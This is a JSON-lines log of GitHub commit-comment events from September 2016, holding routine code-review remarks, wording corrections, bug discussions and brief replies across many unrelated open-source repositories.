{"id":"4520177114","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908123,"position":15,"line":15,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:23:55Z","updated_at":"2016-09-06T09:23:55Z","body":"\"the ESP8266 chip\""}},"created_at":"2016-09-06T09:23:55Z"}
{"id":"4520181287","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18908130,"position":141,"line":213,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:24:46Z","updated_at":"2016-09-06T09:24:46Z","body":"`private`? Also `JvmStatic` is not needed"}},"created_at":"2016-09-06T09:24:46Z"}
{"id":"4520182025","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908135,"position":21,"line":21,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:24:55Z","updated_at":"2016-09-06T09:24:55Z","body":"\"between it\""}},"created_at":"2016-09-06T09:24:55Z"}
{"id":"4520183749","type":"CommitCommentEvent","actor":{"login":"fianreebonz"},"repo":{"name":"jh0ker/mau_mau_bot"},"payload":{"comment":{"id":18908140,"position":null,"line":null,"path":null,"commit_id":"b8e8a7e5de4837dfcf4ec5194e4204567c2efd75","created_at":"2016-09-06T09:25:17Z","updated_at":"2016-09-06T09:25:17Z","body":"how i bluffing in the game with this bot, i search all the command but not found how to bluff :("}},"created_at":"2016-09-06T09:25:17Z"}
{"id":"4520183955","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18908141,"position":5,"line":86,"path":"static/js/app.js","commit_id":"dc4c11d615c95934867f06b21f3f99f7c1a6ac02","created_at":"2016-09-06T09:25:19Z","updated_at":"2016-09-06T09:25:19Z","body":"My understanding is conflicts are stored on the doc separately to revs, but I could be wrong."}},"created_at":"2016-09-06T09:25:19Z"}
{"id":"4520184689","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908142,"position":28,"line":28,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:25:27Z","updated_at":"2016-09-06T09:25:27Z","body":"\"start an interactive MicroPython session\""}},"created_at":"2016-09-06T09:25:27Z"}
{"id":"4520185769","type":"CommitCommentEvent","actor":{"login":"sirupe"},"repo":{"name":"sirupe/jspStudy"},"payload":{"comment":{"id":18908143,"position":null,"line":null,"path":null,"commit_id":"b968f6c49f9e1eb398e3640c3fd63dd904adbf90","created_at":"2016-09-06T09:25:40Z","updated_at":"2016-09-06T09:25:40Z","body":"이거바꿔줄래 ^^"}},"created_at":"2016-09-06T09:25:40Z"}
{"id":"4520187223","type":"CommitCommentEvent","actor":{"login":"sirupe"},"repo":{"name":"sirupe/jspStudy"},"payload":{"comment":{"id":18908150,"position":4,"line":9,"path":"src/test/wow.java","commit_id":"b968f6c49f9e1eb398e3640c3fd63dd904adbf90","created_at":"2016-09-06T09:25:57Z","updated_at":"2016-09-06T09:25:57Z","body":"여기!!!"}},"created_at":"2016-09-06T09:25:57Z"}
{"id":"4520187693","type":"CommitCommentEvent","actor":{"login":"onurag19"},"repo":{"name":"onurag19/ohShopify.php"},"payload":{"comment":{"id":18908151,"position":null,"line":null,"path":null,"commit_id":"4a48df0eaaa09b68b4a93773dbb7be4751988f6c","created_at":"2016-09-06T09:26:02Z","updated_at":"2016-09-06T09:26:02Z","body":"@cmcdonaldca still its giving error \"Oauth error invalid_request: The redirect_uri is missing or not whitelisted\"\r\n\r\nhttps://budli.in/appfolder/authclient.php\r\n\r\nany solutions for this ?\r\n\r\nRegards\r\n"}},"created_at":"2016-09-06T09:26:02Z"}
{"id":"4520188750","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908156,"position":42,"line":42,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:26:15Z","updated_at":"2016-09-06T09:26:15Z","body":"\"tries to be\""}},"created_at":"2016-09-06T09:26:15Z"}
{"id":"4520189406","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18908157,"position":8,"line":8,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-06T09:26:22Z","updated_at":"2016-09-06T09:26:22Z","body":"Хм... Хороший вопрос!))) Как-то заголовок у меня ассоциировался с классом. ))))"}},"created_at":"2016-09-06T09:26:22Z"}
{"id":"4520190435","type":"CommitCommentEvent","actor":{"login":"aurhat"},"repo":{"name":"assaultcube/AC"},"payload":{"comment":{"id":18908160,"position":92,"line":92,"path":"config/convert_pre_v1.2_mapconfig.sh","commit_id":"9c964d95b457785310a3ecc1d2c96a2ec76fefe8","created_at":"2016-09-06T09:26:35Z","updated_at":"2016-09-06T09:26:35Z","body":"In bash it's correct."}},"created_at":"2016-09-06T09:26:35Z"}
{"id":"4520192595","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908168,"position":43,"line":43,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:27:01Z","updated_at":"2016-09-06T09:27:01Z","body":"\"make their own\".\r\nSee if you can rewrite this without repeating \"simple\" so much"}},"created_at":"2016-09-06T09:27:01Z"}
{"id":"4520194085","type":"CommitCommentEvent","actor":{"login":"eNiize"},"repo":{"name":"Dat210Skoleruten/Kode"},"payload":{"comment":{"id":18908173,"position":null,"line":null,"path":null,"commit_id":"86c2f3f409cd61dc5813cdaf22b89a6a11960f7e","created_at":"2016-09-06T09:27:18Z","updated_at":"2016-09-06T09:27:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gIjYPM6n&#x2F;4-test-card\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Test card</a>"}},"created_at":"2016-09-06T09:27:18Z"}
{"id":"4520196378","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908181,"position":44,"line":44,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:27:47Z","updated_at":"2016-09-06T09:27:47Z","body":"\"the basics of programming. You only need one click\""}},"created_at":"2016-09-06T09:27:47Z"}
{"id":"4520196894","type":"CommitCommentEvent","actor":{"login":"imcts"},"repo":{"name":"sirupe/jspStudy"},"payload":{"comment":{"id":18908183,"position":4,"line":9,"path":"src/test/wow.java","commit_id":"b968f6c49f9e1eb398e3640c3fd63dd904adbf90","created_at":"2016-09-06T09:27:54Z","updated_at":"2016-09-06T09:27:54Z","body":"싫은데요. "}},"created_at":"2016-09-06T09:27:54Z"}
{"id":"4520196922","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18908184,"position":71,"line":116,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"08716faae207e923350e6234b8c5a8f45520aea2","created_at":"2016-09-06T09:27:54Z","updated_at":"2016-09-06T09:27:54Z","body":"the positions are set already in configuration.xml no?\n"}},"created_at":"2016-09-06T09:27:54Z"}
{"id":"4520197751","type":"CommitCommentEvent","actor":{"login":"Madji"},"repo":{"name":"theMiddleBlue/BaTbot"},"payload":{"comment":{"id":18908185,"position":null,"line":null,"path":null,"commit_id":"3dfc3116cf25c339766dcbf76b9d98d78d0d3243","created_at":"2016-09-06T09:28:06Z","updated_at":"2016-09-06T09:28:06Z","body":"Look answer bot fo me \r\n\r\nReminder:\r\nHi \\u041c\\u0430\\u043a\\u0441\\u0438\\u043c, pleased to meet you :)\r\n\r\nMy name is Максим Антишин, I'm write about this. "}},"created_at":"2016-09-06T09:28:06Z"}
{"id":"4520199013","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18908192,"position":188,"line":260,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-06T09:28:21Z","updated_at":"2016-09-06T09:28:21Z","body":"It's generic signature so this way is applicable"}},"created_at":"2016-09-06T09:28:21Z"}
{"id":"4520202141","type":"CommitCommentEvent","actor":{"login":"pjc0247"},"repo":{"name":"ssut/py-googletrans"},"payload":{"comment":{"id":18908197,"position":null,"line":null,"path":null,"commit_id":"2f76c45d6ea87773603b348fe4b6cd9394b640a7","created_at":"2016-09-06T09:29:01Z","updated_at":"2016-09-06T09:29:01Z","body":"why not maintained"}},"created_at":"2016-09-06T09:29:01Z"}
{"id":"4520202725","type":"CommitCommentEvent","actor":{"login":"hughperkins"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18908199,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-06T09:29:09Z","updated_at":"2016-09-06T09:29:09Z","body":"Please updatw the readme, at the bottom, where it says 'license'\n\nOn September 6, 2016 10:22:44 AM GMT+01:00, jaredo <notifications@github.com> wrote:\n>Sure. I have added a change to the LICENSE file according to [mozilla's\n>recommendation](https://www.mozilla.org/en-US/MPL/2.0/combining-mpl-and-gpl/)\n>and a note in the README. I am not very familiar with licensing - do\n>you think that is enough?\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/jaredo/jeigen/commit/88df1ef86adc2f4323c0fd970f84ceb8d1f79d41#commitcomment-18908099\n\n-- \nSent from my Android device with K-9 Mail. Please excuse my brevity."}},"created_at":"2016-09-06T09:29:09Z"}
{"id":"4520203507","type":"CommitCommentEvent","actor":{"login":"dfaure"},"repo":{"name":"lydiapintscher/20-years-of-KDE"},"payload":{"comment":{"id":18908201,"position":null,"line":null,"path":null,"commit_id":"8f9a67878473efb73996c32ba8aa642720eed9b1","created_at":"2016-09-06T09:29:19Z","updated_at":"2016-09-06T09:29:19Z","body":"ROTFL, it's all the same to me, but clearly not to you ;) At least I researched that there was a Euro football championship that year to make sure I wasn't saying nonsense.... ok, I failed ;)\r\n\r\nBTW, I still miss you at Akademy every year..."}},"created_at":"2016-09-06T09:29:19Z"}
{"id":"4520204419","type":"CommitCommentEvent","actor":{"login":"ttmc"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":18908204,"position":null,"line":null,"path":null,"commit_id":"603d5ef092bb2487bc8384835ad2ba5058b85a0f","created_at":"2016-09-06T09:29:31Z","updated_at":"2016-09-06T09:29:31Z","body":"I guess the docstring for this method (`validate_tx()`) should say something about how it sometimes deletes tx from the backlog, and when."}},"created_at":"2016-09-06T09:29:31Z"}
{"id":"4520204986","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18908205,"position":null,"line":null,"path":null,"commit_id":"68a20a1be689c5beb01ac6d00010233be616ff58","created_at":"2016-09-06T09:29:38Z","updated_at":"2016-09-06T09:29:38Z","body":"Argh, I must be blind... :) Sorry!"}},"created_at":"2016-09-06T09:29:38Z"}
{"id":"4520206405","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":18908207,"position":null,"line":null,"path":null,"commit_id":"cff519a897611b7b578d260af50e7b46d8434262","created_at":"2016-09-06T09:29:56Z","updated_at":"2016-09-06T09:29:56Z","body":"You merged it yourself though!"}},"created_at":"2016-09-06T09:29:56Z"}
{"id":"4520207731","type":"CommitCommentEvent","actor":{"login":"ServiceLogic"},"repo":{"name":"princeli/princeli.github.io"},"payload":{"comment":{"id":18908210,"position":2,"line":1,"path":"CNAME","commit_id":"5c5ae07013d1576ea0f2f9b348b296333c781223","created_at":"2016-09-06T09:30:15Z","updated_at":"2016-09-06T09:30:15Z","body":"6666666666666666"}},"created_at":"2016-09-06T09:30:15Z"}
{"id":"4520211143","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18908216,"position":null,"line":null,"path":null,"commit_id":"17b3cfbfe236438c529345a7509c3f9af6409a19","created_at":"2016-09-06T09:30:50Z","updated_at":"2016-09-06T09:30:50Z","body":"Done ;-)"}},"created_at":"2016-09-06T09:30:50Z"}
{"id":"4520212327","type":"CommitCommentEvent","actor":{"login":"kashifnaseer"},"repo":{"name":"Leaflet/Leaflet"},"payload":{"comment":{"id":18908218,"position":null,"line":null,"path":null,"commit_id":"b61b7b47570dfbe7d72ef4dbe50b3af85f7b1a8c","created_at":"2016-09-06T09:31:04Z","updated_at":"2016-09-06T09:31:04Z","body":"Thanks @Matheo13 after surfing around 2 hours, finally, i'm able to fix it with the help of your comments."}},"created_at":"2016-09-06T09:31:04Z"}
{"id":"4520212846","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908220,"position":62,"line":62,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:31:12Z","updated_at":"2016-09-06T09:31:12Z","body":"That's true in Fedora Workstation (Gnome). I think we at least need a hint to people without Gnome that mounting is needed. MAybe something along the lines of \"the device is mounted automatically, so you just have to click the button\", which assumes that non-Gnomers know how to mount a filesystem."}},"created_at":"2016-09-06T09:31:12Z"}
{"id":"4520215664","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908227,"position":66,"line":66,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:31:46Z","updated_at":"2016-09-06T09:31:46Z","body":"\"is a simple command line tool\""}},"created_at":"2016-09-06T09:31:46Z"}
{"id":"4520216319","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908228,"position":67,"line":67,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:31:54Z","updated_at":"2016-09-06T09:31:54Z","body":"\"flashing\""}},"created_at":"2016-09-06T09:31:54Z"}
{"id":"4520219650","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"jline/jline3"},"payload":{"comment":{"id":18908235,"position":null,"line":null,"path":null,"commit_id":"27c7827c47a6863180436bb12e57a9d4b52e6084","created_at":"2016-09-06T09:32:35Z","updated_at":"2016-09-06T09:32:35Z","body":"The user should use the following instead imho:\r\n\r\n```TerminalBuilder.nativeSignals(false).terminal();```"}},"created_at":"2016-09-06T09:32:35Z"}
{"id":"4520221250","type":"CommitCommentEvent","actor":{"login":"Mr-Groch"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18908237,"position":null,"line":null,"path":null,"commit_id":"0127b36de0e231eca2f1ac93457899f0ffb1f850","created_at":"2016-09-06T09:32:53Z","updated_at":"2016-09-06T09:32:53Z","body":"Broken pipe and mem leaks are back, yupi! ;)"}},"created_at":"2016-09-06T09:32:53Z"}
{"id":"4520225536","type":"CommitCommentEvent","actor":{"login":"dfaure"},"repo":{"name":"lydiapintscher/20-years-of-KDE"},"payload":{"comment":{"id":18908244,"position":null,"line":null,"path":null,"commit_id":"8f9a67878473efb73996c32ba8aa642720eed9b1","created_at":"2016-09-06T09:33:44Z","updated_at":"2016-09-06T09:33:44Z","body":"https://github.com/lydiapintscher/20-years-of-KDE/commit/4eaa42b8d485118925abc0e35b4d988c44b03eaf"}},"created_at":"2016-09-06T09:33:44Z"}
{"id":"4520232286","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18908255,"position":5,"line":86,"path":"static/js/app.js","commit_id":"dc4c11d615c95934867f06b21f3f99f7c1a6ac02","created_at":"2016-09-06T09:35:07Z","updated_at":"2016-09-06T09:35:07Z","body":"*t;dr; it's fine, or at least as fine as it always was.*\r\n\r\nActually you know what I think we're screwing it up by auto-compacting anyway, which we definitely need to do, so it's fine. Or I don't remember how conflicts work and it doesn't require us to have old versions _or_ metadata, which case it's *actually* fine.\r\n\r\nThought experiment: Imagine we have a report at version 1, which is both on Couch and Pouch. P goes offline, and marks it as read (P2) and edits it to change a value in the report (P3). Meanwhile back at the ranch, an admin reads that report (C2). Later on they sync up. \r\n\r\nAs I understand it P1 & P2, or any record of P1 & P2's existence, now no longer exists. Our universe consists of P3, C2 and metadata about C1 (since couchdb is keeping that atm).\r\n\r\nSo I _think_ that this will result in a new document being created over the overs, marked as conflicted, with P3,C2 as its conflict list. With whichever rev hash is \"larger\" being what is actually represented in data. In P this will be the only version that exists anymore. Which will mean the document still exists (yay!) but if for example we wanted to support some kind of auto conflict resolution (ie we programmatically merge read arrays etc) we can no longer do that. Not that we do that now."}},"created_at":"2016-09-06T09:35:07Z"}
{"id":"4520233037","type":"CommitCommentEvent","actor":{"login":"xiebin1994"},"repo":{"name":"xiebin1994/projectPic"},"payload":{"comment":{"id":18908257,"position":null,"line":null,"path":null,"commit_id":"46d69f18645a3a507ac56f3652cf7fa17c91099d","created_at":"2016-09-06T09:35:16Z","updated_at":"2016-09-06T09:35:16Z","body":"广州道一股份有限公司项目截图"}},"created_at":"2016-09-06T09:35:16Z"}
{"id":"4520234993","type":"CommitCommentEvent","actor":{"login":"antoni-id"},"repo":{"name":"antoni-id/slate"},"payload":{"comment":{"id":18908264,"position":6,"line":5,"path":"README.md","commit_id":"8d3eb0a4333233b4ab9c108f771155a7e6b51334","created_at":"2016-09-06T09:35:38Z","updated_at":"2016-09-06T09:35:38Z","body":"[![Deploy](https://www.herokucdn.com/deploy/button.png)] (https://heroku.com/deploy?template=https://github.com/hone/slate)"}},"created_at":"2016-09-06T09:35:38Z"}
{"id":"4520237043","type":"CommitCommentEvent","actor":{"login":"blueweather"},"repo":{"name":"jushenziao/LauncherDemo"},"payload":{"comment":{"id":18908271,"position":null,"line":null,"path":null,"commit_id":"34b8281d725d2ad611314d76090f16c5182b62fd","created_at":"2016-09-06T09:36:02Z","updated_at":"2016-09-06T09:36:02Z","body":"感谢博主，正好用到"}},"created_at":"2016-09-06T09:36:02Z"}
{"id":"4520237324","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":18908274,"position":null,"line":null,"path":null,"commit_id":"2cb6ebe5a75129156b0ca0f4c69dc12cc7caaf42","created_at":"2016-09-06T09:36:07Z","updated_at":"2016-09-06T09:36:07Z","body":"Вместо console.log и чтоб потом отключалось в extra опциях.\r\nОпять же, внутренности vkopt.log поменять будет легче, чем везде править потом console.log или вкшный логгер"}},"created_at":"2016-09-06T09:36:07Z"}
{"id":"4520246144","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908287,"position":63,"line":63,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:37:51Z","updated_at":"2016-09-06T09:37:51Z","body":"\"flashing the micro:bit\""}},"created_at":"2016-09-06T09:37:51Z"}
{"id":"4520247720","type":"CommitCommentEvent","actor":{"login":"coolo"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18908290,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-06T09:38:13Z","updated_at":"2016-09-06T09:38:13Z","body":"Nevermind, I see it myself now"}},"created_at":"2016-09-06T09:38:13Z"}
{"id":"4520256648","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908301,"position":84,"line":84,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:39:59Z","updated_at":"2016-09-06T09:39:59Z","body":"\"the ESP8266 chip\" ... \"provide\""}},"created_at":"2016-09-06T09:39:59Z"}
{"id":"4520258790","type":"CommitCommentEvent","actor":{"login":"xiebin1994"},"repo":{"name":"xiebin1994/projectPic"},"payload":{"comment":{"id":18908307,"position":null,"line":null,"path":null,"commit_id":"46d69f18645a3a507ac56f3652cf7fa17c91099d","created_at":"2016-09-06T09:40:26Z","updated_at":"2016-09-06T09:40:26Z","body":"广州道一股份有限公司项目截图"}},"created_at":"2016-09-06T09:40:26Z"}
{"id":"4520258854","type":"CommitCommentEvent","actor":{"login":"imnotprogrammer"},"repo":{"name":"imnotprogrammer/SLAN"},"payload":{"comment":{"id":18908308,"position":2,"line":2,"path":"README.md","commit_id":"23538824ac7463ef2fb15c6f720a964f85c39884","created_at":"2016-09-06T09:40:26Z","updated_at":"2016-09-06T09:40:26Z","body":"+介绍以后再写"}},"created_at":"2016-09-06T09:40:26Z"}
{"id":"4520259413","type":"CommitCommentEvent","actor":{"login":"xiebin1994"},"repo":{"name":"xiebin1994/projectPic"},"payload":{"comment":{"id":18908310,"position":null,"line":null,"path":null,"commit_id":"46d69f18645a3a507ac56f3652cf7fa17c91099d","created_at":"2016-09-06T09:40:32Z","updated_at":"2016-09-06T09:40:32Z","body":"广州道一股份有限公司项目截图"}},"created_at":"2016-09-06T09:40:32Z"}
{"id":"4520262001","type":"CommitCommentEvent","actor":{"login":"slideup-benni"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18908316,"position":null,"line":null,"path":null,"commit_id":"d92e8eedadf46cf25eeea0e4ca88313ed99918c2","created_at":"2016-09-06T09:41:03Z","updated_at":"2016-09-06T09:41:03Z","body":"Why?"}},"created_at":"2016-09-06T09:41:03Z"}
{"id":"4520262484","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908317,"position":95,"line":95,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:41:10Z","updated_at":"2016-09-06T09:41:10Z","body":"\"in the result of the `dmesg` command\"\r\n\r\nI'd prefer mentioning `dmesg | tail` explicitly, rather than just referring to the last few lines."}},"created_at":"2016-09-06T09:41:10Z"}
{"id":"4520264020","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908320,"position":108,"line":108,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:41:27Z","updated_at":"2016-09-06T09:41:27Z","body":"\"The name of your device\""}},"created_at":"2016-09-06T09:41:27Z"}
{"id":"4520264067","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18908321,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T09:41:27Z","updated_at":"2016-09-06T09:41:27Z","body":"@olleharstedt : i already have template working wiothout JS in 2.06, except for \"condition\"/\"filter\" .\r\n\r\nIt's the reason why i ask to remove the display=none for this part, and use a em-hidden class (somewhere in feature request).\r\n\r\nBut in fact : except conditions, 2.06 working out of the box without js."}},"created_at":"2016-09-06T09:41:27Z"}
{"id":"4520268891","type":"CommitCommentEvent","actor":{"login":"jaredo"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18908336,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-06T09:42:23Z","updated_at":"2016-09-06T09:42:23Z","body":"Good point! Done."}},"created_at":"2016-09-06T09:42:23Z"}
{"id":"4520270940","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jumjum888/python-bitcoinlib"},"payload":{"comment":{"id":18908339,"position":null,"line":null,"path":null,"commit_id":"1aa9e1771278c44d2fa190a1cca11f8d3793f8cc","created_at":"2016-09-06T09:42:48Z","updated_at":"2016-09-06T09:42:48Z","body":"1aa9e17"}},"created_at":"2016-09-06T09:42:48Z"}
{"id":"4520272518","type":"CommitCommentEvent","actor":{"login":"artkoval4"},"repo":{"name":"andrii142/JavaCourse"},"payload":{"comment":{"id":18908340,"position":7,"line":8,"path":"src/module4/homework/BankSystemImpl.java","commit_id":"b57819b7ed78b1419315866a125332fb23d12dff","created_at":"2016-09-06T09:43:09Z","updated_at":"2016-09-06T09:43:09Z","body":"метод withdrawOfUser, условие должно быть if (userBank.getLimitOfWithdrawal()>= amount) { "}},"created_at":"2016-09-06T09:43:09Z"}
{"id":"4520272570","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18908341,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T09:43:09Z","updated_at":"2016-09-06T09:43:09Z","body":"for validation too? "}},"created_at":"2016-09-06T09:43:09Z"}
{"id":"4520278542","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18908353,"position":39,"line":108,"path":"xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ExternalExtensionCheck.java","commit_id":"bb02da7d7d96bf17045bd34eee6736a7279c9ed9","created_at":"2016-09-06T09:44:14Z","updated_at":"2016-09-06T09:44:14Z","body":"There might be a problem there.\r\n\r\nI have a project that depends on this pom (version 7.4.4), and the groupId is `com.xwiki.cloud.infra`.\r\n\r\nHowever, when I build it, I have the following error:\r\n\r\n```\r\n[INFO] --- maven-enforcer-plugin:1.3.1:enforce (enforce-valid-poms) @ instance-common ---\r\n[WARNING] Rule 0: org.xwiki.tool.enforcer.ExternalExtensionCheck failed with message:\r\nContrib extension group id have to be prefixed with [org.xwiki.contrib]\r\n[...]\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] BUILD FAILURE\r\n[INFO] ------------------------------------------------------------------------\r\n```\r\n\r\nIt's strange because the code seems good."}},"created_at":"2016-09-06T09:44:14Z"}
{"id":"4520279531","type":"CommitCommentEvent","actor":{"login":"hannosch"},"repo":{"name":"zopefoundation/ZServer"},"payload":{"comment":{"id":18908354,"position":13,"line":111,"path":"src/Products/SiteAccess/VirtualHostMonster.py","commit_id":"1d68460a6468ac55ab932b8b89aef31b1d445852","created_at":"2016-09-06T09:44:26Z","updated_at":"2016-09-06T09:44:26Z","body":"I've refactored the WSGIPublisher to handle these correctly. I expanded zExceptions to have exception classes for each HTTP status code, much like WebOb does. As part of that we now have HTTPRedirection (3xx) and HTTPOk (2xx) base classes and you should be able to raise these to return a corresponding response, the same way as Pyramid supports it. HTTPOk supports is still missing a couple minor things though.\r\n\r\nThe code for this is now in the _publish_response function (https://github.com/zopefoundation/Zope/blob/master/src/ZPublisher/WSGIPublisher.py#L267) in combination with the transaction_pubevents context manager (https://github.com/zopefoundation/Zope/blob/master/src/ZPublisher/WSGIPublisher.py#L196) which capture any HTTPRedirection exception (of which Redirect is a subclass)."}},"created_at":"2016-09-06T09:44:26Z"}
{"id":"4520281914","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"ajtowns/snarkfront"},"payload":{"comment":{"id":18908361,"position":null,"line":null,"path":null,"commit_id":"d33a1117f25d462c373ecbeb69b19bb4744ffe86","created_at":"2016-09-06T09:44:55Z","updated_at":"2016-09-06T09:44:55Z","body":"d33a111"}},"created_at":"2016-09-06T09:44:55Z"}
{"id":"4520282764","type":"CommitCommentEvent","actor":{"login":"OzlemBree"},"repo":{"name":"OzlemBree/MyProject"},"payload":{"comment":{"id":18908363,"position":null,"line":null,"path":null,"commit_id":"fd5f69d6408ad21aa0d267aafbdbdac72837866b","created_at":"2016-09-06T09:45:07Z","updated_at":"2016-09-06T09:45:07Z","body":"finished working on the Add Course form."}},"created_at":"2016-09-06T09:45:07Z"}
